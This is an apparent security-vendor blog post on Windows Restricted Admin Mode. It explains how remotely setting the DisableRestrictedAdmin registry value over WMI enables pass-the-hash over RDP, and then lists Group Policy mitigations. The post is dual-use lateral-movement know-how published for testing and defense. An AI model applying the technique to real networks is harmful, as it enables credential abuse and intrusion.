Restricted Admin Mode was implemented in Windows 8.1 to prevent credentials from being exposed over RDP. While well-intended, this brought the ability to pass-the-hash to RDP.
While Restricted Admin Mode is not enabled by default on systems, we can enable it by setting the value of
DisableRestrictedAdmin to 0 at
HKEYLOCALMACHINE\System\CurrentControlSet\Control\Lsa. In order to do this remotely, we could use remote registry, however, this is not always enabled on systems (particularly workstations). Instead, we can use the StdRegProv WMI class to flip this value remotely. This approach was later expanded by @airzero24 in his WMIReg project.
RestrictedAdmin is available for download from GhostPack.
Is my host protected against RestrictedAdmin? in Operator on each host in your environment to test if you are vulnerable.
This chain will stage a RestrictedAdmin binary from Operator and use it to enumerate and adjust the Restricted Admin mode.
Microsoft has provided a list of steps to enable and require RestrictedAdmin on all outbound RDP requests. More information can be found here
Steps to require all outbound Remote Desktop requests to use RestrictedAdmin mode:
Computer Configuration\Policies\Administrative Templates\System\Credentials Delegation
This setting will take effect when Group Policy refreshes. To immediately refresh group policy, open an elevated command prompt and enter the following text:
Gpupdate.exe /target:computer /force
You should also restrict access to Group Policy by opening the following policy setting in your GPO:
Enable this policy setting and select the checkbox labeled
Process even if the Group Policy objects have not changed. This will force Group Policy settings to be reapplied to target computers even when the actual settings within a GPO haven’t changed.
Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:
Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org
See our open-source repositories: https://github.com/preludeorg
Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg